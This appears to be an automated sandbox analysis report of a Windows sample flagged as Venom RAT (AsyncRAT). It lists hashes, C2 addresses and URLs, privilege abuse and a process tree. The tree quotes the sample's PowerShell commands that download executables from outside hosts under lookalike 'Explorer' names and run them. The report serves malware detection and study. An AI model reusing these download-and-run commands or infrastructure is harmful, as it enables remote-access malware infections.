Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
18-08-2024 19:02
Behavioral task
behavioral1
Sample
d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Resource
win7-20240704-en
General
-
Target
d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
-
Size
75KB
-
MD5
6c86e854bfcffef8c6b156ff59c5d6d3
-
SHA1
8f9bd0ba4912b99de55922c91919a4df106d2278
-
SHA256
d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a
-
SHA512
b03618095eb784422bb3ae600784e087cc517139cdd5bb5b93ba25d9f69e1e7da844ea779b7056e5a9b5c015ca706b55b502128224804c29fab7cd6a56be1fbf
-
SSDEEP
1536:02kU8UnRCE8PMRkkUJy8jd1bK/K9Ina4kzkLLVclN:0vUJR6PMRkHJ9d1bK3a4kiBY
Malware Config
Extracted
http://xcu.exgaming.click
Extracted
http://xcu5.exgaming.click
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
109.38.143.137:8888
89.99.115.113:8888
192.168.178.69:8888
zwkzzurhbadjvo
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
resource yara_rule behavioral1/memory/2692-1-0x0000000001050000-0x0000000001068000-memory.dmp VenomRAT -
pid Process 2572 powershell.exe 2996 powershell.exe 2792 powershell.exe 2372 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2572 powershell.exe 2996 powershell.exe 2792 powershell.exe 2372 powershell.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeDebugPrivilege 2572 powershell.exe Token: SeIncreaseQuotaPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeSecurityPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeTakeOwnershipPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeLoadDriverPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeSystemProfilePrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeSystemtimePrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeProfSingleProcessPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeIncBasePriorityPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeCreatePagefilePrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeBackupPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeRestorePrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeShutdownPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeDebugPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeSystemEnvironmentPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeRemoteShutdownPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeUndockPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeManageVolumePrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: 33 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: 34 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: 35 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeIncreaseQuotaPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeSecurityPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeTakeOwnershipPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeLoadDriverPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeSystemProfilePrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeSystemtimePrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeProfSingleProcessPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeIncBasePriorityPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeCreatePagefilePrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeBackupPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeRestorePrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeShutdownPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeDebugPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeSystemEnvironmentPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeRemoteShutdownPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeUndockPrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeManageVolumePrivilege 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: 33 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: 34 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: 35 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe Token: SeDebugPrivilege 2996 powershell.exe Token: SeDebugPrivilege 2792 powershell.exe Token: SeDebugPrivilege 2372 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2692 wrote to memory of 2904 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe 31 PID 2692 wrote to memory of 2904 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe 31 PID 2692 wrote to memory of 2904 2692 d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe 31 PID 2904 wrote to memory of 2572 2904 cmd.exe 33 PID 2904 wrote to memory of 2572 2904 cmd.exe 33 PID 2904 wrote to memory of 2572 2904 cmd.exe 33 PID 2904 wrote to memory of 2996 2904 cmd.exe 35 PID 2904 wrote to memory of 2996 2904 cmd.exe 35 PID 2904 wrote to memory of 2996 2904 cmd.exe 35 PID 2904 wrote to memory of 2792 2904 cmd.exe 36 PID 2904 wrote to memory of 2792 2904 cmd.exe 36 PID 2904 wrote to memory of 2792 2904 cmd.exe 36 PID 2904 wrote to memory of 2372 2904 cmd.exe 37 PID 2904 wrote to memory of 2372 2904 cmd.exe 37 PID 2904 wrote to memory of 2372 2904 cmd.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe"C:\Users\Admin\AppData\Local\Temp\d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5346d17493b278f8aaa41fc2cfe23ffe1
SHA1a5634365f5d36eac142ee28b8c7ad5c684bbff69
SHA256ef27c2ecb1dc622457e1eb280b111b8df1ade1c6f1b71e586cab1147bc746858
SHA512611afa640e3b9811181bf7b543a8641f6b00bae886c3d10df6b05882c2882437dc6c1d999aa8ac47ffb2592bffac643e9925f9fec711667417b89f541e82d604